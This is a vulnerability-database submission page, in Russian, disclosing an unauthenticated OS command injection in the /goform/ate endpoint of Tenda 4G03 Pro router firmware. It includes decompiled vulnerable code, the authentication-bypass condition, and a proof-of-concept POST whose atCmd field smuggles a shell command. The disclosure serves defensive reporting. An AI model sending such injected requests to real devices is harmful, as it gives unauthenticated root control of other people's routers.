| Название | Tenda Tenda 4G03 Pro V1.0 V04.03.01.53 OS Command Injection |
|---|
| Описание | Tenda 4G03 Pro V1.0 /bin/httpd /goform/ate unauthenticated command injection
The /goform/ate endpoint in /usr/sbin/httpd of Tenda 4G03 Pro V1.0
firmware V04.03.01.53 passes the HTTP parameter atCmd directly to
td_common_popen() via snprintf() without sanitization. The
authentication handler FUN_00021a54 explicitly bypasses all security
checks for this endpoint when the admin password is unset, which is
the factory default state. An unauthenticated LAN attacker can
achieve root code execution with a single HTTP POST request.
POC:
Vulnerable code (FUN_000268b4 in /usr/sbin/httpd):
__s1 = FUN_0001f104(param_1, "atCmd");
snprintf(acStack_614, 0x1ff, "serial_atcmd at+%s\r", __s1);
td_common_popen(acStack_614, ...);
Auth bypass (FUN_00021a54):
if (strncmp(url, "/goform/ate", 0xb) == 0 &&
DAT_00050f14 == '\0') goto pass_through;
PoC request:
POST /goform/ate HTTP/1.1
Host: 192.168.0.1
Content-Type: application/json
{"atCmd":"ati; id > /tmp/pwned"} |
|---|
| Пользователь | CoreNode (UID 96566) |
|---|
| Представление | 18.03.2026 03:13 (20 дни назад) |
|---|
| Модерация | 04.04.2026 08:17 (17 days later) |
|---|
| Статус | Дубликат |
|---|
| Запись VulDB | 333199 [Tenda 4G03 Pro до 04.03.01.44 /usr/sbin/httpd эскалация привилегий] |
|---|
| Баллы | 0 |
|---|